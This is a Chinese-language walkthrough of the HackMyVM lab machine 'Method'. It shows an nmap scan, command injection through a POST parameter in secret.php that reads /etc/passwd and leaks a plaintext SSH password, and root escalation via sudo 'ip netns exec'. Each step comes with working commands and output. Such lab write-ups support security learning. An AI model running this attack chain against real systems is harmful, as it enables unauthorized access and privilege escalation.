hack-my-vm:method

Method

端口扫描

kali@kali [~] ➜  sudo nmap -p- -sT --min-rate 1000 192.168.1.236                                                                                 [21:13:15]
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-25 21:16 CST
Nmap scan report for 192.168.1.236
Host is up (0.0022s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1F:7F:13 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.83 seconds

80端口渗透

kali@kali [~] ➜  sudo  dirsearch -u "http://192.168.1.236/"                                                                                      [21:26:06]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.236/__25-01-25_21-27-07.txt

Target: http://192.168.1.236/

[21:27:07] Starting: 
[21:27:48] 200 -  344B  - /index.htm
[21:28:10] 200 -  285B  - /sitemap.xml

Task Completed

/sitemap.xml没发现啥有用的东西，去/index.htm看看

这里发现了一个php文件，请求方式为GET，访问的参数为HackMyVM，我们尝试访问一下

kali@kali [~] ➜  curl "http://192.168.1.236/secret.php?HackMyVM=id"                                                                              [21:31:21]
Now the main part what it is loooooool<br>Try other method

这里给了我们提示，让我们尝试另一种访问方式

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=id'                                                                 [21:35:04]
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>

有结果了，估计是命令执行，去读一下别的文件验证一下

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=cat /etc/passwd'                                                    [21:36:19]
You Found ME : - (<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
prakasaka:x:1000:1000:prakasaka,,,:/home/prakasaka:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

发现了一个叫prakasaka的用户，在读secret.php文件时，发现泄露了密码

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=cat secret.php'                                                     [21:36:25]
You Found ME : - (<pre><?php
if(isset($_GET['HackMyVM'])){
        echo "Now the main part what it is loooooool";
        echo "<br>";
echo "Try other method";
        die;
}
if(isset($_POST['HackMyVM'])){
        echo "You Found ME : - (";
        echo "<pre>";
        $cmd = ($_POST['HackMyVM']);
        system($cmd);
        echo "</pre>";
        die;
}
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
}
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>

那就直接登录呗，其实在我读这个文件前，我尝试了wget下载文件，但是失败了，原因是权限不够

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=ls -la'                                                             [21:37:34]
You Found ME : - (<pre>total 7264
drwxr-xr-x 2 root root    4096 Oct 23  2021 .
drwxr-xr-x 3 root root    4096 Oct 23  2021 ..
-rw-r--r-- 1 root root 5325119 May  6  2021 hacker.gif
-rw-r--r-- 1 root root     344 Oct 23  2021 index.htm
-rw-r--r-- 1 root root    3690 Oct 23  2021 index.html
-rw-r--r-- 1 root root      23 Oct 23  2021 note.txt
-rw-r--r-- 1 root root 2078389 Nov 30  2020 office.gif
-rw-r--r-- 1 root root     471 Oct 23  2021 secret.php
-rw-r--r-- 1 root root     285 Oct 23  2021 sitemap.xml

远程登录与提权

kali@kali [~] ➜  ssh prakasaka@192.168.1.236                                                                                                     [21:47:55]
prakasaka@192.168.1.236's password: 
Linux method 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jan 25 07:59:42 2025 from 192.168.1.4
prakasaka@method:~$ ls
uSeR.txt
prakasaka@method:~$ whoami
prakasaka
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
    (!root) NOPASSWD: /bin/bash
    (root) /bin/ip
prakasaka@method:~$ 

发现了sudo可以执行的命令，直接查阅文档提权

prakasaka@method:~$ sudo /bin/ip netns add fuu
prakasaka@method:~$ sudo /bin/ip netns exec  fuu /bin/sh
# whoami 
root
# id
uid=0(root) gid=0(root) groups=0(root)
#